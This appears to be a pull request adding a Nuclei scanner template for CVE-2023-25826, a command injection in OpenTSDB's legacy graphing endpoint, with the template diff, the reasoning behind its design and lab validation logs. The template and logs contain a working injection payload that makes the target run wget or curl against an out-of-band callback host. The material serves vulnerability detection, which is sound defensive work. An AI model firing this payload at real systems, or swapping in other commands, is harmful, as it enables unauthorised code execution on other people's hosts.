### PR TITLE
CVE-2023-25826 - OpenTSDB <=2.4.1 - Remote Code Execution

### DIFF
--- a/http/cves/2023/CVE-2023-25826.yaml
+++ b/http/cves/2023/CVE-2023-25826.yaml
@@ -1,15 +1,15 @@
 id: CVE-2023-25826
 
 info:
-  name: OpenTSDB <=2.4.1 - Remote Code Execution
+  name: OpenTSDB <= 2.4.1 - Unauthenticated RCE via Gnuplot Injection
   author: aryu-ru
   severity: critical
   description: |
-    OpenTSDB 2.4.1 and prior are vulnerable to command injection through the key parameter of the legacy /q graphing endpoint. The submitted value is written into a gnuplot script without validation, allowing an unauthenticated attacker to append a gnuplot system() directive and execute arbitrary operating system commands. This is an incomplete fix for CVE-2020-35476, which only constrained the yrange parameter.
+    OpenTSDB contains a command injection caused by insufficient validation of parameters passed to the legacy HTTP query API, letting attackers inject crafted OS commands and execute malicious code, exploit requires sending crafted parameters.
   impact: |
-    Unauthenticated attackers can execute arbitrary operating system commands as the OpenTSDB service account, leading to full compromise of the host.
+    Attackers can execute arbitrary OS commands on the host system, potentially leading to full system compromise.
   remediation: |
-    Upgrade to OpenTSDB 2.5.0-RC1 or later, which passes the key parameter through validateString() before it reaches the gnuplot script.
+    Implement comprehensive input validation and update to the latest version that addresses this issue.
   reference:
     - https://github.com/OpenTSDB/opentsdb/pull/2275
     - https://github.com/vulhub/vulhub/blob/master/opentsdb/CVE-2023-25826/README.md
@@ -20,15 +20,16 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2023-25826
     cwe-id: CWE-78
-    cpe: cpe:2.3:a:opentsdb:opentsdb:*:*:*:*:*:*:*:*
   metadata:
     verified: true
     max-request: 2
     vendor: opentsdb
     product: opentsdb
     shodan-query: http.favicon.hash:407286339
-    fofa-query: body="opentsdb"
+    fofa-query: title="OpenTSDB"
   tags: cve,cve2023,opentsdb,rce,oast,unauth,packetstorm
+
+flow: http(1) && http(2)
 
 http:
   - raw:
@@ -36,34 +37,34 @@ http:
         GET /api/suggest?type=metrics&q=&max=1 HTTP/1.1
         Host: {{Hostname}}
 
-      - |
-        GET /q?start=1h-ago&m=sum:{{metric}}&key=out%20right%20top%0asystem%20%22wget%20-q%20-T%205%20-O%20/dev/null%20http://{{interactsh-url}}%22&json HTTP/1.1
-        Host: {{Hostname}}
-
-    matchers-condition: and
     matchers:
-      - type: word
-        part: interactsh_protocol
-        words:
-          - "http"
-
-      - type: word
-        part: body_2
-        words:
-          - '"plotted"'
-          - '"points"'
-          - '"etags"'
-        condition: and
-
       - type: dsl
         dsl:
-          - "status_code_2 == 200"
+          - status_code == 200
+          - contains(content_type, "application/json")
+          - contains(body, "[\"")
+          - '!contains(body, "<html")'
+        condition: and
+        internal: true
 
     extractors:
       - type: regex
         name: metric
         part: body
-        internal: true
+        group: 1
         regex:
           - '^\["([^"]+)"'
-        group: 1
+        internal: true
+
+  - raw:
+      - |
+        GET /q?start=1h-ago&m=sum:{{metric}}&key=out%20right%20top%0asystem%20%22wget%20-q%20-T%205%20-O%20/dev/null%20http://{{interactsh-url}}%20%7C%7C%20curl%20-sk%20--max-time%205%20http://{{interactsh-url}}%22&json HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains_any(interactsh_protocol, "http", "dns")
+          - contains_all(body, "plotted", "points", "etags")
+          - status_code == 200
+        condition: and

--- a/http/cves/2023/CVE-2023-25826.yaml
+++ b/http/cves/2023/CVE-2023-25826.yaml
@@ -1,0 +1,69 @@
+id: CVE-2023-25826
+
+info:
+  name: OpenTSDB <=2.4.1 - Remote Code Execution
+  author: aryu-ru
+  severity: critical
+  description: |
+    OpenTSDB 2.4.1 and prior are vulnerable to command injection through the key parameter of the legacy /q graphing endpoint. The submitted value is written into a gnuplot script without validation, allowing an unauthenticated attacker to append a gnuplot system() directive and execute arbitrary operating system commands. This is an incomplete fix for CVE-2020-35476, which only constrained the yrange parameter.
+  impact: |
+    Unauthenticated attackers can execute arbitrary operating system commands as the OpenTSDB service account, leading to full compromise of the host.
+  remediation: |
+    Upgrade to OpenTSDB 2.5.0-RC1 or later, which passes the key parameter through validateString() before it reaches the gnuplot script.
+  reference:
+    - https://github.com/OpenTSDB/opentsdb/pull/2275
+    - https://github.com/vulhub/vulhub/blob/master/opentsdb/CVE-2023-25826/README.md
+    - http://packetstormsecurity.com/files/174570/OpenTSDB-2.4.1-Unauthenticated-Command-Injection.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-25826
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-25826
+    cwe-id: CWE-78
+    cpe: cpe:2.3:a:opentsdb:opentsdb:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: opentsdb
+    product: opentsdb
+    shodan-query: http.favicon.hash:407286339
+    fofa-query: body="opentsdb"
+  tags: cve,cve2023,opentsdb,rce,oast,unauth,packetstorm
+
+http:
+  - raw:
+      - |
+        GET /api/suggest?type=metrics&q=&max=1 HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /q?start=1h-ago&m=sum:{{metric}}&key=out%20right%20top%0asystem%20%22wget%20-q%20-T%205%20-O%20/dev/null%20http://{{interactsh-url}}%22&json HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: word
+        part: body_2
+        words:
+          - '"plotted"'
+          - '"points"'
+          - '"etags"'
+        condition: and
+
+      - type: dsl
+        dsl:
+          - "status_code_2 == 200"
+
+    extractors:
+      - type: regex
+        name: metric
+        part: body
+        internal: true
+        regex:
+          - '^\["([^"]+)"'
+        group: 1


### PR DESCRIPTION
### PR Information

Adds a template for **CVE-2023-25826**, unauthenticated command injection in OpenTSDB `<= 2.4.1`.

**Mechanism.** The legacy `/q` graphing endpoint copies user-supplied plot parameters into a gnuplot script. In 2.4.1 the `key` parameter reaches `Plot`/gnuplot without validation, so a value containing a newline followed by `system "<cmd>"` is written as an extra gnuplot directive and executed by the gnuplot process running as the OpenTSDB service account. This is the incomplete fix for CVE-2020-35476, which only constrained `yrange`; OpenTSDB PR #2275 later routed `key` (and the other plot params) through `validateString()`.

**Template request flow** (2 requests):
1. `GET /api/suggest?type=metrics&q=&max=1` reads one existing metric name. This is required: with no metric in the query, the graph handler throws `NoSuchUniqueName` and returns HTTP 500 before gnuplot ever runs, so a single-request template silently false-negatives. The name is captured with an internal extractor.
2. `GET /q?start=1h-ago&m=sum:{{metric}}&key=out right top%0asystem "wget -q -T 5 -O /dev/null http://{{interactsh-url}}"&json` injects the gnuplot directive.

A match requires **all** of: the OOB interaction, the JSON graph response (`plotted` / `points` / `etags`), and HTTP 200 on the second request.

**Target configuration required.** OpenTSDB reachable over HTTP with at least one metric present (any real deployment has one). No credentials needed.

**Notes on design**
- Detection keys on the out-of-band interaction, not on the response body alone. The graph response is byte-identical whether or not injection occurred, so the body by itself cannot distinguish a vulnerable host. The OOB callback is what proves execution.
- The template does not require `plotted: 1`. gnuplot runs, and the injected command executes, even when the time range contains no data points (`{"plotted":0,...,"points":0}`), so requiring a plotted series would cause false negatives.
- The metric name is only read, never written. The vulhub README suggests `POST /api/put/` to auto-create a metric; that writes a data point into the target's time-series database, so it is deliberately not used here.
- `wget -T 5` bounds the request. gnuplot's `system()` is synchronous and holds the HTTP response open until the command returns, so an unbounded command would stall the scan against hosts with no egress.

**References**
- https://github.com/OpenTSDB/opentsdb/pull/2275
- https://github.com/vulhub/vulhub/blob/master/opentsdb/CVE-2023-25826/README.md
- http://packetstormsecurity.com/files/174570/OpenTSDB-2.4.1-Unauthenticated-Command-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-25826

**Classification:** CWE-78 (OS Command Injection), CVSS 3.1 9.8 `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`, `cpe:2.3:a:opentsdb:opentsdb`

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

Lab: `docker run -d -p 4242:4242 vulhub/opentsdb:2.4.1` (vulhub `opentsdb/CVE-2023-25826`).
Patched target: same image with `tsdb-2.5.0-RC1.jar` from the v2.5.0RC1 release swapped into `/usr/share/opentsdb/lib/`, which is the first release containing PR #2275.

**True positive: vulnerable 2.4.1**

```
GET /q?start=1h-ago&m=sum:sys.cpu.nice&key=out%20right%20top%0asystem%20%22wget%20-q%20-T%205%20-O%20/dev/null%20http://REDACTED.oast.pro%22&json HTTP/1.1

HTTP/1.1 200 OK
Content-Type: application/json

{"plotted":0,"timing":139,"etags":[[]],"points":0}

[REDACTED] Received HTTP interaction from <lab-host> at 2026-08-20 06:56:21
GET / HTTP/1.1
User-Agent: Wget/1.21

[CVE-2023-25826] [http] [critical] http://127.0.0.1:4242/q?...
[INF] Scan completed in 5.24s.
```

**True negatives**

| Target | Result |
| --- | --- |
| OpenTSDB 2.5.0-RC1 (patched) | no match |
| OpenTSDB 2.4.1, egress to the OOB host blocked | no match |
| nginx (unrelated service) | no match |

On the patched build the same request is rejected before gnuplot runs:

```
HTTP/1.1 400 Bad Request
{"err":"Invalid key (\"out right top\nsystem \"...\"\"): illegal character:  "}
```

The second negative is the one that matters for false positives: that host is genuinely vulnerable and still returns `200 {"plotted":0,...}`, and the injected command does execute locally, but with no interaction received the template correctly does not fire. Detection therefore depends on proven execution rather than on a reachable-and-responding OpenTSDB.

**Relationship to the existing CVE-2020-35476 template**

`http/cves/2020/CVE-2020-35476.yaml` does not cover this. Replaying its `yrange` payload against 2.4.1 returns `HTTP 400 {"err":"'yrange' was invalid. Must be in the format [min:max]."}` and nothing executes. 2.4.1 fixed `yrange` but left `key` unvalidated. Its matcher also requires `cachehit`, which 2.4.1 does not emit. No other template in the repo references CVE-2023-25826 (`http/exposures/logs/opentsdb-status.yaml` is detect-only against `/stats?json`).

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
